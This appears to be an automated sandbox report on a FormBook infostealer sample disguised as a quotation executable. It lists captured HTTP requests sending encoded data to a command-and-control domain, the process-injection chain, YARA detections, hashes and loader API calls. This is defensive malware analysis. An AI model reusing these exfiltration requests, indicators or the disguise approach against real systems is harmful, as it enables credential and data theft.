Jul 5, 2024 03:25:44.584398031 CEST	10853	OUT	POST /2e2r/ HTTP/1.1 Host: www.hsck520.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.hsck520.com Referer: http://www.hsck520.com/2e2r/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 35 63 47 6f 59 2b 54 36 44 56 79 77 34 55 68 45 6b 4a 33 72 71 2b 37 2b 42 68 52 39 74 53 73 49 39 58 77 63 77 6b 32 39 67 33 36 61 44 54 6c 7a 67 54 69 55 6a 4f 68 68 32 63 6f 6f 4f 71 49 39 59 66 77 50 6a 31 42 45 68 54 4b 50 53 55 6f 63 64 46 64 71 79 39 71 62 4f 4e 54 6b 73 69 4f 56 6d 57 2b 71 45 78 4d 71 4d 58 35 55 77 2f 4f 46 78 4d 67 6f 79 73 7a 49 41 46 68 52 47 78 47 68 43 6f 37 64 64 35 48 39 32 35 44 61 66 46 70 6e 42 45 35 32 75 66 66 71 79 56 2b 4e 63 59 32 77 7a 52 58 50 4c 6c 6c 63 46 63 67 6b 75 56 70 32 39 59 65 56 30 67 42 76 37 66 51 4d 4f 70 64 51 74 54 54 57 43 2f 44 34 74 56 6b 37 65 74 4b 6f 6f 70 76 68 52 6d 56 38 5a 48 50 75 4e 76 45 33 4f 67 4f 2b 48 4d 64 75 74 79 61 53 36 59 2f 56 58 76 45 78 59 59 4b 7a 56 72 74 50 41 46 4e 75 54 7a 4a 32 49 76 33 69 70 54 6e 77 56 33 6c 73 38 75 48 7a 54 39 70 6d 38 66 71 46 53 52 6c 61 52 44 74 70 72 35 6f 5a 55 79 30 44 41 42 4a 44 7a 37 76 49 78 46 68 44 31 4d 31 4e 39 32 43 42 63 77 30 52 50 67 59 73 58 47 2b [TRUNCATED] Data Ascii: 9TND4h=5cGoY+T6DVyw4UhEkJ3rq+7+BhR9tSsI9Xwcwk29g36aDTlzgTiUjOhh2cooOqI9YfwPj1BEhTKPSUocdFdqy9qbONTksiOVmW+qExMqMX5Uw/OFxMgoyszIAFhRGxGhCo7dd5H925DafFpnBE52uffqyV+NcY2wzRXPLllcFcgkuVp29YeV0gBv7fQMOpdQtTTWC/D4tVk7etKoopvhRmV8ZHPuNvE3OgO+HMdutyaS6Y/VXvExYYKzVrtPAFNuTzJ2Iv3ipTnwV3ls8uHzT9pm8fqFSRlaRDtpr5oZUy0DABJDz7vIxFhD1M1N92CBcw0RPgYsXG+fVvbPgI3XWBqPLHaz63GNIc3vQGL0C3wLtFLgsJQwr4tIOpvCCKRXFm0ncHOW9yysvhZpttTp1cNJ8Mh3t84xVbyNbKpgaXxWV3rkF7SN0naI0ZogKIgOr2Lk/OK9GK9EWlm8PPRMS/4VJ76LM9njzUSlTftsFrCUicItry9htQ9uLuwj6ZyVFaLVTyPPnJsaIKKjtXn3uh+jJ0eCplpbrXUC49Q/gg4Y4RVd3JvIesbRGivdpYXig8UjOk2DECdzHFoNyBFtpkBT7Z/G2Sgg1KlK69lVve2QFFkHV7j8wDSgZCgebVwpklf8Q5eIQnS/Qev6NogkK2tTBx2FtoR3zk7OuQmFHvoZl6C/3i1WDYp7V4HVSFjGMGLY5fFf5MYwxwg/MeoMjeQ7lSEVZb7+8+sFY2f9wEJhUBZOWXaylZWP9kIjAuOprhOKA4R2dKnDU8QVLrbccY7pUZtrMygKxeap7xhO6HX7bL9l8S4c8+XiO/k6mADe7aeIA5MZ66kzuzCNOeHh1d7HkKI3f/KbfZK8D2g4GqrJegXKwIa75jSqML+VW3fNPDaWt0OZJr1eXou1dhs7yR/HsH8cqFCI/+e6PzgULmr02RQJMKdTdfozmSOuCs4TJWFd9kzeu/JP4uaKI6AWmupx/hKQc8DS7XR8LrL6ucvRN [TRUNCATED]
Jul 5, 2024 03:25:45.233792067 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Fri, 05 Jul 2024 01:25:45 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close
Jul 5, 2024 03:25:45.237335920 CEST	559	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	52682	35.190.52.58	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:25:47.112498045 CEST	489	OUT	GET /2e2r/?9TND4h=0euIbLTFP3+EyEtzvor9i8vHBXpYgQpCpm4T5C+2kVz8Gw9LnD+VjddQp9QTALZxA8pe/VRvpSGAU2oGCWkdjrfpA+HWsjyp03alRT8mG3hS2I+8+ag3/fo=&MXOD=nDFLlbM87h HTTP/1.1 Host: www.hsck520.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jul 5, 2024 03:25:47.763231039 CEST	300	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Fri, 05 Jul 2024 01:25:47 GMT Content-Type: text/html Content-Length: 5161 Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT Vary: Accept-Encoding ETag: "65a4939c-1429" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close
Jul 5, 2024 03:25:47.766855955 CEST	1236	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
Jul 5, 2024 03:25:47.766868114 CEST	1236	IN	Data Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f Data Ascii: w Image).src=n}function reportLoading(n){n=n\|\|{};var o=function(){for(var n=(window.location.search.substr(1)\|\|"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
Jul 5, 2024 03:25:47.766876936 CEST	56	IN	Data Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()\|\|r())&&"android
Jul 5, 2024 03:25:47.775326014 CEST	1236	IN	Data Raw: 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f Data Ascii: "===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)\|\|n.match(/ipad/i)\|\|n.match(/iphone/i)?"iphone":n.match(/android/i)\|\|n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&
Jul 5, 2024 03:25:47.775336027 CEST	1236	IN	Data Raw: 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 24 73 63 72 69 70 74 31 2c 24 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 Data Ascii: min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"
Jul 5, 2024 03:25:47.775346994 CEST	161	IN	Data Raw: b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f e6 97 b6 e7 9c 8b 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 Data Ascii: </div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>

Target ID:	0
Start time:	21:21:53
Start date:	04/07/2024
Path:	C:\Users\user\Desktop\PTT Group project - Quotation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PTT Group project - Quotation.exe"
Imagebase:	0x910000
File size:	1'176'576 bytes
MD5 hash:	0FFEE94B9FB3A74D3F1AD3774EDC51ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:21:54
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PTT Group project - Quotation.exe"
Imagebase:	0xf30000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:21:57
Start date:	04/07/2024
Path:	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe"
Imagebase:	0x690000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	21:21:59
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\RMActivate_ssp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\RMActivate_ssp.exe"
Imagebase:	0x80000
File size:	478'720 bytes
MD5 hash:	6599A09C160036131E4A933168DA245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	21:22:13
Start date:	04/07/2024
Path:	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe"
Imagebase:	0x690000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	21:22:24
Start date:	04/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	2.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	177

Executed Functions

Function 00913B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00913B7A
IsDebuggerPresent.KERNEL32 ref: 00913B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,009D62F8,009D62E0,?,?), ref: 00913BFD

Part of subcall function 00917D2C: _memmove.LIBCMT ref: 00917D66

Part of subcall function 00920A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00913C26,009D62F8,?,?,?), ref: 00920ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00913C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009C93F0,00000010), ref: 0094D4BC
SetCurrentDirectoryW.KERNEL32(?,009D62F8,?,?,?), ref: 0094D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009C5D40,009D62F8,?,?,?), ref: 0094D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0094D581

Part of subcall function 00913A58: GetSysColorBrush.USER32(0000000F), ref: 00913A62
Part of subcall function 00913A58: LoadCursorW.USER32(00000000,00007F00), ref: 00913A71
Part of subcall function 00913A58: LoadIconW.USER32(00000063), ref: 00913A88
Part of subcall function 00913A58: LoadIconW.USER32(000000A4), ref: 00913A9A
Part of subcall function 00913A58: LoadIconW.USER32(000000A2), ref: 00913AAC
Part of subcall function 00913A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00913AD2
Part of subcall function 00913A58: RegisterClassExW.USER32(?), ref: 00913B28

Part of subcall function 009139E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00913A15
Part of subcall function 009139E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00913A36
Part of subcall function 009139E7: ShowWindow.USER32(00000000,?,?), ref: 00913A4A
Part of subcall function 009139E7: ShowWindow.USER32(00000000,?,?), ref: 00913A53

Part of subcall function 009143DB: _memset.LIBCMT ref: 00914401
Part of subcall function 009143DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009144A6

Strings

This is a third-party compiled AutoIt script., xrefs: 0094D4B4
runas, xrefs: 0094D575

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 53829d4f0b2df134ad82b365db3cc44dcc729c07e04857e2d2fa126dae4c1699
Instruction ID: adc74f5de89a98ceda7c078f54bddbbc767838343a13fc17846d120b26b9fcb7
Opcode Fuzzy Hash: 53829d4f0b2df134ad82b365db3cc44dcc729c07e04857e2d2fa126dae4c1699
Instruction Fuzzy Hash: A6511B30B4924DAACF119BF4DC16FEDBB78AF84300B008066F9A1E21A2DA7446C5D761

Function 00914AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00914B2B

Part of subcall function 00917D2C: _memmove.LIBCMT ref: 00917D66

GetCurrentProcess.KERNEL32(?,0099FAEC,00000000,00000000,?), ref: 00914BF8
IsWow64Process.KERNEL32(00000000), ref: 00914BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00914C45
FreeLibrary.KERNEL32(00000000), ref: 00914C50
GetSystemInfo.KERNEL32(00000000), ref: 00914C81
GetSystemInfo.KERNEL32(00000000), ref: 00914C8D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: a6c0d24ad4c04042785ea4fb881760afdc6ab628ecfde872a6728b9f8c279959
Instruction ID: 98653008136b8ac01cdd12e40ab628ddffc0767afb124b031369195c709091c0
Opcode Fuzzy Hash: a6c0d24ad4c04042785ea4fb881760afdc6ab628ecfde872a6728b9f8c279959
Instruction Fuzzy Hash: 6391E931A8E7C4DEC731CB7894915EAFFE4AF2A301B444D9ED0CB83A41D224E988D759

Function 00914FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00914EEE,?,?,00000000,00000000), ref: 00914FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00914EEE,?,?,00000000,00000000), ref: 00915010
LoadResource.KERNEL32(?,00000000,?,?,00914EEE,?,?,00000000,00000000,?,?,?,?,?,?,00914F8F), ref: 0094DD60
SizeofResource.KERNEL32(?,00000000,?,?,00914EEE,?,?,00000000,00000000,?,?,?,?,?,?,00914F8F), ref: 0094DD75
LockResource.KERNEL32(00914EEE,?,?,00914EEE,?,?,00000000,00000000,?,?,?,?,?,?,00914F8F,00000000), ref: 0094DD88

Strings

SCRIPT, xrefs: 00915006

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 6ff73026a6107741cae45b15564a102855fe7f6130a4c44fa18363798aab71c9
Instruction ID: aac965159fc0be1648dc7bdc0038e63b4c077f621d6bc87abc0fe1ac94bdd8e3
Opcode Fuzzy Hash: 6ff73026a6107741cae45b15564a102855fe7f6130a4c44fa18363798aab71c9
Instruction Fuzzy Hash: 4A115A75204704AFE7218B69DC68F6BBBBEEBC9B11F214169F41AC6260DB61E840D660

Function 00974696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0094E7C1), ref: 009746A6
FindFirstFileW.KERNELBASE(?,?), ref: 009746B7
FindClose.KERNEL32(00000000), ref: 009746C7

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: d7ffbf5ec7a9cf077fbde2e454d9e91b3d2e7e328f4ec80db8e9b6809e67e900
Instruction ID: 2ee75097d740cee80e7567e3668af3e02bee48651d267a6989b793b4f0123f32
Opcode Fuzzy Hash: d7ffbf5ec7a9cf077fbde2e454d9e91b3d2e7e328f4ec80db8e9b6809e67e900
Instruction Fuzzy Hash: A3E020334244005B4610673CEC5D4EEB75CEE06375F104717F839C10E0E7B45D5095D5

Function 0091E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 0095428C

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: fb5966f1c785ad7f789edfd0b79acc31a23ee84f5e4736a80067dfcac2e5d1de
Instruction ID: 4e6c97d21bda331009952ea70b39d83e30d2641ad10381fc2a706bcd5dc7a45a
Opcode Fuzzy Hash: fb5966f1c785ad7f789edfd0b79acc31a23ee84f5e4736a80067dfcac2e5d1de
Instruction Fuzzy Hash: 93A26B75B04209CBCB24CF94C890AEAB7B6FF48304F648469ED16AB351D735ADC6CB91

Function 00920B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00920BBB
timeGetTime.WINMM ref: 00920E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00920FB3
TranslateMessage.USER32(?), ref: 00920FC7
DispatchMessageW.USER32(?), ref: 00920FD5
Sleep.KERNEL32(0000000A), ref: 00920FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0092105A
DestroyWindow.USER32 ref: 00921066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00921080
Sleep.KERNEL32(0000000A,?,?), ref: 009552AD
TranslateMessage.USER32(?), ref: 0095608A
DispatchMessageW.USER32(?), ref: 00956098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009560AC

Strings

@GUI_CTRLHANDLE, xrefs: 0095540E
@TRAY_ID, xrefs: 00955BB9
@GUI_WINHANDLE, xrefs: 009553B9
@COM_EVENTOBJ, xrefs: 0095591A
@GUI_CTRLID, xrefs: 00955364

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 4a29ac7e55f31ee75f226cb0258f8ebe3ee1511f76ec6da608d085d952bb1717
Instruction ID: 23c7c84879290d39b372a69e0b117df5d4884995faed4e65256b1f8d0723ad2c
Opcode Fuzzy Hash: 4a29ac7e55f31ee75f226cb0258f8ebe3ee1511f76ec6da608d085d952bb1717
